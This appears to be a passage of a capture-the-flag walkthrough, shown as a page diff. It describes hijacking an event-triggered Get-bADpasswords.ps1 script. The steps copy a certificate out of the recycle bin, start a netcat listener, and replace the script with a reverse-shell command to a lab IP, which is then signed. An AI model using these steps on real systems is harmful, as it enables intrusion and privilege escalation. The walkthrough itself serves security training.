githubEdit

 In the C:\Get-bADpasswords directory we have a run.vbs file:

-So, when this run.vbs file is executed it creates an event in the Windows event log (documentation about eventcreate).
+So, when this run.vbs file is executed it creates an event in the Windows event log (documentation about eventcreatearrow-up-right).
 I think something picks up that event and executes the C:\Get-bADpasswords\Get-bADpasswords.ps1 script as a different user.
 So, if we replace the Get-bADpasswords.ps1 with a reverse shell and sign it with the certificate, we should get a reverse shell.

 First, create a temporary directory with mkdir C:\Temp and then run copy C:\$Recycle.bin\S-1-5-21-3783586571-2109290616-3725730865-2663\$RLYS3KF.pfx C:\Temp\sign.pfx to copy the certificate.
 Start a listener wtih nc -nvlp 3997.
 Next, run cmd.exe /c "echo C:\share\Bginfo64.exe 10.10.14.116 3997 -e cmd.exe > C:\Get-bADpasswords\Get-bADpasswords.ps1".
 Then, import the pfx and sign the script by running the following with the password we found (make sure to run in powershell):